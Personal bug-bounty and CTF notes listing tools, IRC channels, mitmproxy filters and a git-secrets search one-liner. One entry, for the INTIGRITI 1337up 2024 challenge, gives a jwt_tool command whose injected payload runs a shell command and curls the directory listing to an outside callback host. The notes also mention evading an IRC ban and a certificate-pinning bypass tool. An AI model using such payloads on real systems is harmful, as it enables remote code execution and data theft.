Notes

Tools:

• ghauri (possibly better than sqlmap)

Tomnomnom's one liner for github repo secrets:

• { find .git/objects/pack/ -name "*.idx"|while read i;do git show-index < "$i"|awk '{print $2}';done;find .git/objects/ -type f|grep -v '/pack/'|awk -F'/' '{print $(NF-1)$NF}'; }|while read o;do git cat-file -p $o;done|grep -E 'pattern'

IRC > (discord) channels:

• https://www.ircdriven.com
• https://www.irchelp.org/ "f_ If you want to install it on your VPS be sure to not open ports M51 listens to to the public" "f_ M51 is not multiuser "
• Reference: https://blog.x-e.ro/irc_reference
• Check that out https://static.pwn.college/modules/intro/phisher-hackback.txt
• bitreich training gym! ssh://[email protected]
• There is an attack in irc.supernets.org #5000 Joined too many channels? buffer overflow
• obtaining cert using libressl openssl s_client -connect irc.Prison.NET:6697 -showcerts </dev/null | openssl x509 -fingerprint -sha512 -noout
• For efnet you have to hack your way in, via ban evasion.

mitmproxy > (burp, zap, caido) imo

• set modify_headers /X/meow (set X:meow header to any request)
• ~u .* & ~q (intercept all requests and not responses)
• https://quickref.me/mitmproxy.html
• Portswigger filter expression: ~u academy & !(~u resources | ~u image | ~u LabHeader | ~u favicon)

Split html into many lines: https://littleforest.co.uk/split-up-xml-or-html-elements-in-vim/

• :%s/></>\r</g (Use \r instead of \n for new line).

Mobile hacking set up:

• https://github.com/stulle123/kakaotalk_analysis/blob/main/doc/SETUP.md

Interisting Sites that do not have RSS feed and likely not to be updated.

• https://fravia.deadbsd.org/search.lores.eu/indexo.html

domxxswiki

• https://github.com/wisec/domxsswiki/wiki/location,-documentURI-and-URL-sources

Firefox plugins

• Foxyproxy (remember to turn no proxy in the firefox settings and set it up in HTTP no HTTPS!)

Commands:

1. Extracting request, modifying and then viewing it in the browser for experimentation.

   POST /challenges/challenge-2.php HTTP/1.1
   Host: www.bugbountytraining.com
   User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
   Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
   Accept-Language: en-US,en;q=0.5
   + Accept-Encoding: identity
   - Accept-Encoding: gzip, deflate, br, zstd
   Content-Type: application/x-www-form-urlencoded
   Content-Length: 15
   Origin: https://www.bugbountytraining.com
   Connection: keep-alive
   Referer: https://www.bugbountytraining.com/challenges/challenge-2.php
   Upgrade-Insecure-Requests: 1
   Sec-Fetch-Dest: document
   Sec-Fetch-Mode: navigate
   Sec-Fetch-Site: same-origin
   Sec-Fetch-User: ?1
   Priority: u=0, i
   
   imageClass=img1
   

   cat request.txt | socat - openssl:www.bugbountytraining.com:443,commonname=www.bugbountytraining.com > test.html && open -a Firefox test.html

• INTIGRITI 1337up 2024 cat club.

  ./jwt_tool.py -r request.txt -X k -pk public.key -I -pc username -pv "#{function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad(\"child_process\").exec('curl https://cstlob08cumtciu1c120pntk5xenz99i6.oast.fun?=\`ls /|base64\`')}()}"

Collaborator labs
find . -type f -exec grep -H --colour=always '(Pro)' {} ';'

Apple's annoying certificate pinning:

• https://github.com/nabla-c0d3/ssl-kill-switch2?tab=readme-ov-file